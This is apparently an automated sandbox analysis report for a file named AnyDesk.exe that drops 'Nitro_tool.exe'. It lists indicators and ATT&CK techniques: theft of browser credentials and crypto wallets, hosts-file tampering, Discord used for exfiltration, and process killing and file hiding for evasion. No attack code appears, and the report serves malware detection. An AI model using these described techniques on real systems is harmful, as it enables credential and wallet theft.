55e4ce3fe726043070ecd7de5a74b2459ea8bed19ef2a36ce7884b2ab0863047

Analysis

max time kernel
209s
max time network
212s
platform
windows11-21h2_x64
resource
win11-20240412-en
resource tags

arch:x64arch:x86image:win11-20240412-enlocale:en-usos:windows11-21h2-x64system
submitted
14-04-2024 12:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

AnyDesk.exe
Size

5.0MB
MD5

a21768190f3b9feae33aaef660cb7a83
SHA1

24780657328783ef50ae0964b23288e68841a421
SHA256

55e4ce3fe726043070ecd7de5a74b2459ea8bed19ef2a36ce7884b2ab0863047
SHA512

ca6da822072cb0d3797221e578780b19c8953e4207729a002a64a00ced134059c0ed21b02572c43924e4ba3930c0e88cd2cdb309259e3d0dcfb0c282f1832d62
SSDEEP

98304:NzTZ3cINQscs0m++LNkT6OpwDGUUH57yvZ/49Mr8EO3QhA9Kq:Nzt3cINQscNmvLCwDkHEvZ/4R79x

Score

8^/10

spyware stealer upx

Malware Config

Signatures

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Nitro_tool.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 22 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000100000002aa92-499.dat	upx
behavioral1/memory/5652-504-0x00007FFF11FA0000-0x00007FFF12589000-memory.dmp	upx
behavioral1/files/0x000100000002aa90-508.dat	upx
behavioral1/files/0x000100000002aa91-512.dat	upx
behavioral1/memory/5652-514-0x00007FFF2E990000-0x00007FFF2E9B3000-memory.dmp	upx
behavioral1/memory/5652-513-0x00007FFF2B240000-0x00007FFF2B24F000-memory.dmp	upx
behavioral1/files/0x000100000002aa8f-511.dat	upx
behavioral1/files/0x000100000002aa85-507.dat	upx
behavioral1/memory/5652-531-0x00007FFF2B0F0000-0x00007FFF2B109000-memory.dmp	upx
behavioral1/memory/5652-532-0x00007FFF26A70000-0x00007FFF26A93000-memory.dmp	upx
behavioral1/memory/5652-534-0x00007FFF26520000-0x00007FFF26539000-memory.dmp	upx
behavioral1/memory/5652-536-0x00007FFF264E0000-0x00007FFF26513000-memory.dmp	upx
behavioral1/memory/5652-535-0x00007FFF2A280000-0x00007FFF2A28D000-memory.dmp	upx
behavioral1/memory/5652-533-0x00007FFF11E20000-0x00007FFF11F97000-memory.dmp	upx
behavioral1/memory/5652-530-0x00007FFF29EF0000-0x00007FFF29F1D000-memory.dmp	upx
behavioral1/memory/5652-537-0x00007FFF11D50000-0x00007FFF11E1D000-memory.dmp	upx
behavioral1/memory/5652-538-0x00007FFF11830000-0x00007FFF11D50000-memory.dmp	upx
behavioral1/memory/5652-540-0x00007FFF29EC0000-0x00007FFF29ECD000-memory.dmp	upx
behavioral1/memory/5652-541-0x00007FFF25D80000-0x00007FFF25D94000-memory.dmp	upx
behavioral1/memory/5652-542-0x00007FFF11710000-0x00007FFF1182C000-memory.dmp	upx
behavioral1/memory/5652-726-0x00007FFF11FA0000-0x00007FFF12589000-memory.dmp	upx
behavioral1/memory/5652-727-0x00007FFF2E990000-0x00007FFF2E9B3000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Downloads MZ/PE file

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
72	discord.com
74	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
72	ip-api.com
3	ip-api.com

Drops file in System32 directory 15 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db	AnyDesk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_256.db	AnyDesk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1280.db	AnyDesk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1920.db	AnyDesk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_2560.db	AnyDesk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide.db	AnyDesk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db	AnyDesk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db	AnyDesk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide_alternate.db	AnyDesk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db	AnyDesk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_exif.db	AnyDesk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_sr.db	AnyDesk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_custom_stream.db	AnyDesk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_96.db	AnyDesk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_768.db	AnyDesk.exe

Drops file in Windows directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	UserOOBEBroker.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	UserOOBEBroker.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setupact.log	UserOOBEBroker.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	UserOOBEBroker.exe

Executes dropped EXE 3 IoCs

pid	Process
4108	Nitro_tool.exe
5652	Nitro_tool.exe
1592	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
5652	Nitro_tool.exe
5652	Nitro_tool.exe
5652	Nitro_tool.exe
5652	Nitro_tool.exe
5652	Nitro_tool.exe
5652	Nitro_tool.exe
5652	Nitro_tool.exe
5652	Nitro_tool.exe
5652	Nitro_tool.exe
5652	Nitro_tool.exe
5652	Nitro_tool.exe
5652	Nitro_tool.exe
5652	Nitro_tool.exe
5652	Nitro_tool.exe
5652	Nitro_tool.exe
5652	Nitro_tool.exe
5652	Nitro_tool.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AnyDesk.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	AnyDesk.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
5640	WMIC.exe
5552	WMIC.exe
3480	WMIC.exe

Enumerates processes with tasklist 1 TTPs 5 IoCs

Process Discovery

T1057

pid	Process
3328	tasklist.exe
3864	tasklist.exe
5524	tasklist.exe
1416	tasklist.exe
4224	tasklist.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
1748	systeminfo.exe

Kills process with taskkill 17 IoCs

evasion

pid	Process
1972	taskkill.exe
3476	taskkill.exe
2424	taskkill.exe
2272	taskkill.exe
3308	taskkill.exe
5004	taskkill.exe
2388	taskkill.exe
1192	taskkill.exe
732	taskkill.exe
5696	taskkill.exe
5240	taskkill.exe
5384	taskkill.exe
5864	taskkill.exe
5936	taskkill.exe
5704	taskkill.exe
1344	taskkill.exe
4836	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133575710277045891"	chrome.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3777591257-2471171023-3629228286-1000_Classes\Local Settings\MuiCache	MiniSearchHost.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Nitro_tool.exe:Zone.Identifier	chrome.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
5780	PING.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
4468	AnyDesk.exe

Suspicious behavior: EnumeratesProcesses 34 IoCs

pid	Process
4136	AnyDesk.exe
4136	AnyDesk.exe
912	chrome.exe
912	chrome.exe
4136	AnyDesk.exe
4136	AnyDesk.exe
4136	AnyDesk.exe
4136	AnyDesk.exe
1344	chrome.exe
1344	chrome.exe
428	powershell.exe
428	powershell.exe
5632	powershell.exe
5632	powershell.exe
428	powershell.exe
5632	powershell.exe
396	powershell.exe
396	powershell.exe
396	powershell.exe
2364	powershell.exe
2364	powershell.exe
2364	powershell.exe
4004	powershell.exe
4004	powershell.exe
4004	powershell.exe
1956	powershell.exe
1956	powershell.exe
1956	powershell.exe
4860	powershell.exe
4860	powershell.exe
4860	powershell.exe
2844	powershell.exe
2844	powershell.exe
2844	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs

pid	Process
912	chrome.exe
912	chrome.exe
912	chrome.exe
912	chrome.exe
912	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	912	chrome.exe
Token: SeCreatePagefilePrivilege	912	chrome.exe
Token: SeShutdownPrivilege	912	chrome.exe
Token: SeCreatePagefilePrivilege	912	chrome.exe
Token: SeShutdownPrivilege	912	chrome.exe
Token: SeCreatePagefilePrivilege	912	chrome.exe
Token: SeShutdownPrivilege	912	chrome.exe
Token: SeCreatePagefilePrivilege	912	chrome.exe
Token: SeShutdownPrivilege	912	chrome.exe
Token: SeCreatePagefilePrivilege	912	chrome.exe
Token: SeShutdownPrivilege	912	chrome.exe
Token: SeCreatePagefilePrivilege	912	chrome.exe
Token: SeShutdownPrivilege	912	chrome.exe
Token: SeCreatePagefilePrivilege	912	chrome.exe
Token: SeShutdownPrivilege	912	chrome.exe
Token: SeCreatePagefilePrivilege	912	chrome.exe
Token: SeShutdownPrivilege	912	chrome.exe
Token: SeCreatePagefilePrivilege	912	chrome.exe
Token: SeShutdownPrivilege	912	chrome.exe
Token: SeCreatePagefilePrivilege	912	chrome.exe
Token: SeShutdownPrivilege	912	chrome.exe
Token: SeCreatePagefilePrivilege	912	chrome.exe
Token: SeShutdownPrivilege	912	chrome.exe
Token: SeCreatePagefilePrivilege	912	chrome.exe
Token: SeShutdownPrivilege	912	chrome.exe
Token: SeCreatePagefilePrivilege	912	chrome.exe
Token: SeShutdownPrivilege	912	chrome.exe
Token: SeCreatePagefilePrivilege	912	chrome.exe
Token: SeShutdownPrivilege	912	chrome.exe
Token: SeCreatePagefilePrivilege	912	chrome.exe
Token: SeShutdownPrivilege	912	chrome.exe
Token: SeCreatePagefilePrivilege	912	chrome.exe
Token: SeShutdownPrivilege	912	chrome.exe
Token: SeCreatePagefilePrivilege	912	chrome.exe
Token: SeShutdownPrivilege	912	chrome.exe
Token: SeCreatePagefilePrivilege	912	chrome.exe
Token: SeShutdownPrivilege	912	chrome.exe
Token: SeCreatePagefilePrivilege	912	chrome.exe
Token: SeShutdownPrivilege	912	chrome.exe
Token: SeCreatePagefilePrivilege	912	chrome.exe
Token: SeShutdownPrivilege	912	chrome.exe
Token: SeCreatePagefilePrivilege	912	chrome.exe
Token: SeShutdownPrivilege	912	chrome.exe
Token: SeCreatePagefilePrivilege	912	chrome.exe
Token: SeShutdownPrivilege	912	chrome.exe
Token: SeCreatePagefilePrivilege	912	chrome.exe
Token: SeShutdownPrivilege	912	chrome.exe
Token: SeCreatePagefilePrivilege	912	chrome.exe
Token: SeShutdownPrivilege	912	chrome.exe
Token: SeCreatePagefilePrivilege	912	chrome.exe
Token: SeShutdownPrivilege	912	chrome.exe
Token: SeCreatePagefilePrivilege	912	chrome.exe
Token: SeShutdownPrivilege	912	chrome.exe
Token: SeCreatePagefilePrivilege	912	chrome.exe
Token: SeShutdownPrivilege	912	chrome.exe
Token: SeCreatePagefilePrivilege	912	chrome.exe
Token: SeShutdownPrivilege	912	chrome.exe
Token: SeCreatePagefilePrivilege	912	chrome.exe
Token: SeShutdownPrivilege	912	chrome.exe
Token: SeCreatePagefilePrivilege	912	chrome.exe
Token: SeShutdownPrivilege	912	chrome.exe
Token: SeCreatePagefilePrivilege	912	chrome.exe
Token: SeShutdownPrivilege	912	chrome.exe
Token: SeCreatePagefilePrivilege	912	chrome.exe

Suspicious use of FindShellTrayWindow 49 IoCs

pid	Process
4468	AnyDesk.exe
4468	AnyDesk.exe
4468	AnyDesk.exe
912	chrome.exe
912	chrome.exe
912	chrome.exe
912	chrome.exe
912	chrome.exe
912	chrome.exe
912	chrome.exe
912	chrome.exe
912	chrome.exe
912	chrome.exe
912	chrome.exe
912	chrome.exe
912	chrome.exe
912	chrome.exe
912	chrome.exe
912	chrome.exe
912	chrome.exe
912	chrome.exe
912	chrome.exe
912	chrome.exe
912	chrome.exe
912	chrome.exe
912	chrome.exe
912	chrome.exe
912	chrome.exe
912	chrome.exe
4468	AnyDesk.exe
4468	AnyDesk.exe
4468	AnyDesk.exe
912	chrome.exe
912	chrome.exe
912	chrome.exe
912	chrome.exe
912	chrome.exe
912	chrome.exe
912	chrome.exe
912	chrome.exe
912	chrome.exe
912	chrome.exe
912	chrome.exe
912	chrome.exe
912	chrome.exe
912	chrome.exe
912	chrome.exe
912	chrome.exe
912	chrome.exe

Suspicious use of SendNotifyMessage 22 IoCs

pid	Process
4468	AnyDesk.exe
4468	AnyDesk.exe
4468	AnyDesk.exe
912	chrome.exe
912	chrome.exe
912	chrome.exe
912	chrome.exe
912	chrome.exe
912	chrome.exe
912	chrome.exe
912	chrome.exe
912	chrome.exe
912	chrome.exe
912	chrome.exe
912	chrome.exe
4468	AnyDesk.exe
4468	AnyDesk.exe
4468	AnyDesk.exe
912	chrome.exe
912	chrome.exe
912	chrome.exe
912	chrome.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
4996	MiniSearchHost.exe
5868	AnyDesk.exe
5868	AnyDesk.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4748 wrote to memory of 4136	4748	AnyDesk.exe	81
PID 4748 wrote to memory of 4136	4748	AnyDesk.exe	81
PID 4748 wrote to memory of 4136	4748	AnyDesk.exe	81
PID 4748 wrote to memory of 4468	4748	AnyDesk.exe	82
PID 4748 wrote to memory of 4468	4748	AnyDesk.exe	82
PID 4748 wrote to memory of 4468	4748	AnyDesk.exe	82
PID 912 wrote to memory of 4604	912	chrome.exe	91
PID 912 wrote to memory of 4604	912	chrome.exe	91
PID 912 wrote to memory of 4088	912	chrome.exe	92
PID 912 wrote to memory of 4088	912	chrome.exe	92
PID 912 wrote to memory of 4088	912	chrome.exe	92
PID 912 wrote to memory of 4088	912	chrome.exe	92
PID 912 wrote to memory of 4088	912	chrome.exe	92
PID 912 wrote to memory of 4088	912	chrome.exe	92
PID 912 wrote to memory of 4088	912	chrome.exe	92
PID 912 wrote to memory of 4088	912	chrome.exe	92
PID 912 wrote to memory of 4088	912	chrome.exe	92
PID 912 wrote to memory of 4088	912	chrome.exe	92
PID 912 wrote to memory of 4088	912	chrome.exe	92
PID 912 wrote to memory of 4088	912	chrome.exe	92
PID 912 wrote to memory of 4088	912	chrome.exe	92
PID 912 wrote to memory of 4088	912	chrome.exe	92
PID 912 wrote to memory of 4088	912	chrome.exe	92
PID 912 wrote to memory of 4088	912	chrome.exe	92
PID 912 wrote to memory of 4088	912	chrome.exe	92
PID 912 wrote to memory of 4088	912	chrome.exe	92
PID 912 wrote to memory of 4088	912	chrome.exe	92
PID 912 wrote to memory of 4088	912	chrome.exe	92
PID 912 wrote to memory of 4088	912	chrome.exe	92
PID 912 wrote to memory of 4088	912	chrome.exe	92
PID 912 wrote to memory of 4088	912	chrome.exe	92
PID 912 wrote to memory of 4088	912	chrome.exe	92
PID 912 wrote to memory of 4088	912	chrome.exe	92
PID 912 wrote to memory of 4088	912	chrome.exe	92
PID 912 wrote to memory of 4088	912	chrome.exe	92
PID 912 wrote to memory of 4088	912	chrome.exe	92
PID 912 wrote to memory of 4088	912	chrome.exe	92
PID 912 wrote to memory of 4088	912	chrome.exe	92
PID 912 wrote to memory of 4088	912	chrome.exe	92
PID 912 wrote to memory of 4380	912	chrome.exe	93
PID 912 wrote to memory of 4380	912	chrome.exe	93
PID 912 wrote to memory of 3080	912	chrome.exe	94
PID 912 wrote to memory of 3080	912	chrome.exe	94
PID 912 wrote to memory of 3080	912	chrome.exe	94
PID 912 wrote to memory of 3080	912	chrome.exe	94
PID 912 wrote to memory of 3080	912	chrome.exe	94
PID 912 wrote to memory of 3080	912	chrome.exe	94
PID 912 wrote to memory of 3080	912	chrome.exe	94
PID 912 wrote to memory of 3080	912	chrome.exe	94
PID 912 wrote to memory of 3080	912	chrome.exe	94
PID 912 wrote to memory of 3080	912	chrome.exe	94
PID 912 wrote to memory of 3080	912	chrome.exe	94
PID 912 wrote to memory of 3080	912	chrome.exe	94
PID 912 wrote to memory of 3080	912	chrome.exe	94
PID 912 wrote to memory of 3080	912	chrome.exe	94
PID 912 wrote to memory of 3080	912	chrome.exe	94
PID 912 wrote to memory of 3080	912	chrome.exe	94
PID 912 wrote to memory of 3080	912	chrome.exe	94
PID 912 wrote to memory of 3080	912	chrome.exe	94
PID 912 wrote to memory of 3080	912	chrome.exe	94
PID 912 wrote to memory of 3080	912	chrome.exe	94
PID 912 wrote to memory of 3080	912	chrome.exe	94
PID 912 wrote to memory of 3080	912	chrome.exe	94
PID 912 wrote to memory of 3080	912	chrome.exe	94

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1972	attrib.exe
792	attrib.exe
3688	attrib.exe

C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe
"C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe"
1⤵
- Checks processor information in registry
- Suspicious use of WriteProcessMemory
PID:4748
- C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe
  "C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe" --local-service
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4136
- - C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe
    "C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe" --backend
    3⤵
    - Drops file in System32 directory
    - Suspicious use of SetWindowsHookEx
    PID:5868
- C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe
  "C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe" --local-control
  2⤵
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:4468

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:912
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff14c0ab58,0x7fff14c0ab68,0x7fff14c0ab78
  2⤵
  PID:4604
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1524 --field-trial-handle=1768,i,16443380348158157621,14767075883993902857,131072 /prefetch:2
  2⤵
  PID:4088
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2120 --field-trial-handle=1768,i,16443380348158157621,14767075883993902857,131072 /prefetch:8
  2⤵
  PID:4380
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2192 --field-trial-handle=1768,i,16443380348158157621,14767075883993902857,131072 /prefetch:8
  2⤵
  PID:3080
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3040 --field-trial-handle=1768,i,16443380348158157621,14767075883993902857,131072 /prefetch:1
  2⤵
  PID:3892
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3148 --field-trial-handle=1768,i,16443380348158157621,14767075883993902857,131072 /prefetch:1
  2⤵
  PID:3552
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4148 --field-trial-handle=1768,i,16443380348158157621,14767075883993902857,131072 /prefetch:1
  2⤵
  PID:5388
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4308 --field-trial-handle=1768,i,16443380348158157621,14767075883993902857,131072 /prefetch:8
  2⤵
  PID:5496
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4328 --field-trial-handle=1768,i,16443380348158157621,14767075883993902857,131072 /prefetch:8
  2⤵
  PID:5504
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4388 --field-trial-handle=1768,i,16443380348158157621,14767075883993902857,131072 /prefetch:8
  2⤵
  PID:5852
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4680 --field-trial-handle=1768,i,16443380348158157621,14767075883993902857,131072 /prefetch:8
  2⤵
  PID:5916
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4460 --field-trial-handle=1768,i,16443380348158157621,14767075883993902857,131072 /prefetch:8
  2⤵
  PID:5956
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4384 --field-trial-handle=1768,i,16443380348158157621,14767075883993902857,131072 /prefetch:1
  2⤵
  PID:1032
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1832 --field-trial-handle=1768,i,16443380348158157621,14767075883993902857,131072 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1344
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=4772 --field-trial-handle=1768,i,16443380348158157621,14767075883993902857,131072 /prefetch:1
  2⤵
  PID:5816
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2408 --field-trial-handle=1768,i,16443380348158157621,14767075883993902857,131072 /prefetch:8
  2⤵
  PID:3836
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5040 --field-trial-handle=1768,i,16443380348158157621,14767075883993902857,131072 /prefetch:8
  2⤵
  PID:2628
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5052 --field-trial-handle=1768,i,16443380348158157621,14767075883993902857,131072 /prefetch:8
  2⤵
  PID:5156
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5344 --field-trial-handle=1768,i,16443380348158157621,14767075883993902857,131072 /prefetch:8
  2⤵
  - NTFS ADS
  PID:5372
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4404 --field-trial-handle=1768,i,16443380348158157621,14767075883993902857,131072 /prefetch:8
  2⤵
  PID:6132
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=1136 --field-trial-handle=1768,i,16443380348158157621,14767075883993902857,131072 /prefetch:8
  2⤵
  PID:2232

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:4712

